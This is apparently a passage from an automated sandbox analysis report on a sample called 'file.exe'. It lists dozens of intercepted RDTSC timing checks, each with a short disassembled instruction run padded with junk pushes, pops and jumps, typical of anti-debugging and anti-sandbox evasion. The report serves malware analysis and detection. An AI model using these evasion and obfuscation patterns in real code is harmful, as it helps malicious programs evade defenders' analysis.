                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DD1B second address: 78DD21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DD21 second address: 78DD43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FD0F8CDABE6h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E4A7 second address: 78E4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E4AC second address: 78E4D1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD0F8CDABECh 0x00000008 push ecx 0x00000009 jmp 00007FD0F8CDABF4h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C412 second address: 78C418 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C418 second address: 78C41E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C41E second address: 78C422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C422 second address: 78C428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793E74 second address: 793E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793E78 second address: 793E9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8CDABEEh 0x00000010 je 00007FD0F8CDABE6h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793E9F second address: 793EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793EA3 second address: 793EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D9952 second address: 6D996D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007FD0F8E1A7A6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0ED6 second address: 7A0F09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD0F8CDABEEh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ebx 0x00000013 jmp 00007FD0F8CDABF8h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0F09 second address: 7A0F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD0F8E1A7A6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2CD5 second address: 7A2CD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2B6B second address: 7A2B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A2B71 second address: 7A2B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FD0F8CDABE6h 0x0000000a jmp 00007FD0F8CDABEFh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C8851 second address: 6C8857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6E6C second address: 7B6E8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnc 00007FD0F8CDABE6h 0x00000009 pop edx 0x0000000a jmp 00007FD0F8CDABEAh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007FD0F8CDABE6h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6E8B second address: 7B6EA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD0F8E1A7AAh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6EA1 second address: 7B6EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6EA5 second address: 7B6EB2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0F8E1A7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6EB2 second address: 7B6EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D104F second address: 6D1055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D1055 second address: 6D105C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D105C second address: 6D1076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7B6h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6C96 second address: 7B6CAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007FD0F8CDABF0h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6CAD second address: 7B6CD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD0F8E1A7AFh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6CD4 second address: 7B6CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF0DF second address: 7BF0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD8E6 second address: 7BD91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD0F8CDABE6h 0x0000000a jmp 00007FD0F8CDABF4h 0x0000000f popad 0x00000010 jmp 00007FD0F8CDABF9h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD91E second address: 7BD93D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FD0F8E1A7B3h 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BDD56 second address: 7BDD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1EF3 second address: 7C1EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4FB6 second address: 7D4FC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4FC0 second address: 7D4FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4FC4 second address: 7D5022 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF3h 0x00000007 jl 00007FD0F8CDABE6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 jmp 00007FD0F8CDABEFh 0x00000015 jg 00007FD0F8CDABE6h 0x0000001b pop ebx 0x0000001c popad 0x0000001d pushad 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 push edx 0x00000022 pop edx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 jmp 00007FD0F8CDABF1h 0x0000002b pushad 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 pushad 0x00000032 jne 00007FD0F8CDABE6h 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D4E29 second address: 7D4E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD49F second address: 7CD4A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD4A3 second address: 7CD4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD4AF second address: 7CD4B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD4B3 second address: 7CD4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2AD6 second address: 7E2B09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD0F8CDABF4h 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007FD0F8CDABEEh 0x00000012 jnl 00007FD0F8CDABE6h 0x00000018 pushad 0x00000019 popad 0x0000001a jnp 00007FD0F8CDABEEh 0x00000020 pushad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E40E8 second address: 7E40EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE5D5 second address: 7FE5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD44B second address: 7FD451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD451 second address: 7FD456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FD756 second address: 7FD75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDA32 second address: 7FDA36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDD6B second address: 7FDD6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDD6F second address: 7FDD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD0F8CDABF5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDD8D second address: 7FDD95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FDF38 second address: 7FDF43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE311 second address: 7FE316 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE316 second address: 7FE323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FE323 second address: 7FE348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c je 00007FD0F8E1A7A6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 jbe 00007FD0F8E1A7A6h 0x0000001c popad 0x0000001d jo 00007FD0F8E1A7AEh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 800FB1 second address: 800FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 804361 second address: 80436B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD0F8E1A7A6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 80436B second address: 804371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803EB2 second address: 803EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803EBB second address: 803EBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 803EBF second address: 803EC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC01B4 second address: 4EC01D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC01D1 second address: 4EC01E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8E1A7ACh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC01E1 second address: 4EC01E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF05E5 second address: 4EF0619 instructions: 0x00000000 rdtsc 0x00000002 call 00007FD0F8E1A7ABh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov eax, 03D9ACEBh 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD0F8E1A7B4h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0619 second address: 4EF061D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF061D second address: 4EF0623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0623 second address: 4EF0629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0629 second address: 4EF062D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF062D second address: 4EF0631 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0631 second address: 4EF0648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push edi 0x0000000c mov edi, esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov ch, 78h 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0648 second address: 4EF0651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 2AAAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8015E second address: 4E80164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E80164 second address: 4E801E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8CDABEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD0F8CDABEBh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FD0F8CDABF6h 0x00000015 mov ebp, esp 0x00000017 jmp 00007FD0F8CDABF0h 0x0000001c push dword ptr [ebp+04h] 0x0000001f jmp 00007FD0F8CDABF0h 0x00000024 push dword ptr [ebp+0Ch] 0x00000027 jmp 00007FD0F8CDABF0h 0x0000002c push dword ptr [ebp+08h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FD0F8CDABF7h 0x00000036 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0BFF second address: 4EA0C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0C03 second address: 4EA0C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0C09 second address: 4EA0C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0251 second address: 4EB0257 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0257 second address: 4EB025B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB025B second address: 4EB025F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0509 second address: 4EF0566 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 call 00007FD0F8E1A7B9h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebp 0x0000000f jmp 00007FD0F8E1A7ACh 0x00000014 mov dword ptr [esp], ebp 0x00000017 jmp 00007FD0F8E1A7B0h 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD0F8E1A7B7h 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC04A5 second address: 4EC04B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD0F8CDABF0h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC04B9 second address: 4EC04FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d call 00007FD0F8E1A7B4h 0x00000012 mov bx, ax 0x00000015 pop eax 0x00000016 mov ebx, 21965A32h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD0F8E1A7ABh 0x00000027 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC04FB second address: 4EC0501 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0501 second address: 4EC0538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007FD0F8E1A7B0h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 pushad 0x00000015 mov esi, 3FF7D3FDh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0538 second address: 4EC053E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA056F second address: 4EA05B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 pushfd 0x00000007 jmp 00007FD0F8E1A7B3h 0x0000000c or ecx, 35E789DEh 0x00000012 jmp 00007FD0F8E1A7B9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA05B0 second address: 4EA05E5 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007FD0F8CDABF7h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD0F8CDABF0h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA05E5 second address: 4EA05F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC005B second address: 4EC0101 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 pushfd 0x00000006 jmp 00007FD0F8CDABF8h 0x0000000b or al, 00000008h 0x0000000e jmp 00007FD0F8CDABEBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FD0F8CDABF4h 0x0000001f xor cl, 00000068h 0x00000022 jmp 00007FD0F8CDABEBh 0x00000027 popfd 0x00000028 jmp 00007FD0F8CDABF8h 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov ecx, edi 0x00000035 pushfd 0x00000036 jmp 00007FD0F8CDABF9h 0x0000003b sbb ah, FFFFFFE6h 0x0000003e jmp 00007FD0F8CDABF1h 0x00000043 popfd 0x00000044 popad 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC0101 second address: 4EC0126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0F8E1A7B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0F8E1A7ADh 0x00000011 rdtsc
